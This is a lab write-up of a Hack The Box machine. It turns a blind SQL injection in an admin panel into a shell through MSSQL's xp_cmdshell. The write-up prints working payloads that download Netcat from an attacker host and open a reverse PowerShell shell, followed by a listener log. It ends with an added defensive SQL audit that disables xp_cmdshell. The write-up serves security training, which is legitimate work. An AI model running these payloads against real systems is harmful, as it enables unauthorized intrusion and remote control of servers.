SQLi to RCE


A SQL injection vulnerability has been confirmed at the /check-duplicate-post-title endpoint of the admin panel.

Since it is a blind SQLi, enumerating the database would be rather tedious. Given that the MSSQL instance backs the admin panel, it might be running with relatively high privileges, so I will attempt to get code execution directly via xp_cmdshell.

Initial Attempt (SMB)


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ simplesmb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0

Setting up a local SMB server

Sending the SQLi payload

It seems to have fetched the Netcat binary, but there is no execution. Either the C:\ directory is not writable, or something is restricting the SMB transfer.

Second Attempt (HTTP)


I will try again over HTTP, writing to a different directory.

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) exec master..xp_cmdshell 'powershell -ep bypass -c "curl http://10.10.14.110/nc64.exe -o %TEMP%\nc64.exe"' --

This downloads the Netcat binary over HTTP into the %TEMP% directory.

Fetched!

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) exec master..xp_cmdshell 'powershell -ep bypass -c "%TEMP%\nc64.exe 10.10.14.110 9999 -e powershell"' --

Now the execution.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ nnc 9999                                                                    
listening on [any] 9999 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.22] 50690
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
blazorized\nu_1055
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.22
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the nu_1055 account via MSSQL's xp_cmdshell.
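The counterpart check a defender would run on the instance, added here as an example that is not part of the original writeup: it reports whether xp_cmdshell is enabled, which Windows account the SQL Server service runs as (the account the shell above landed as), the IsIntegratedSecurityOnly property the payload branches on, and which logins hold sysadmin, then disables the procedure. It assumes sysadmin access to a SQL Server 2008 R2 SP1 or later instance; nothing in it is specific to this box.

```sql
-- Added hardening/audit check (example, not from the original writeup).
-- Assumes a sysadmin connection to the MSSQL instance behind the admin panel.

-- 1. Is xp_cmdshell currently enabled? value_in_use = 1 means the
--    procedure is callable by any sysadmin (or a login granted EXECUTE).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Which Windows account does the Database Engine run as?
--    An OS shell spawned via xp_cmdshell inherits this account,
--    so a domain account here turns SQLi into a domain foothold.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 3. Authentication mode. The injected payload branches on this
--    property; 0 means SQL logins (such as the app's) are accepted.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS integrated_only;

-- 4. Which logins could (re-)enable or run xp_cmdshell? Every sysadmin
--    member can; an application login should not appear in this list.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;

-- 5. Disable xp_cmdshell and re-hide the advanced options.
--    Note: a sysadmin can still flip it back, which is why step 4
--    (least privilege for the application login) is the real fix.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

The two findings that matter most are steps 2 and 4: if the application login is not a sysadmin it cannot enable or call xp_cmdshell at all, and if the service runs as a low-privileged local or virtual account, whatever it does spawn does not carry domain credentials.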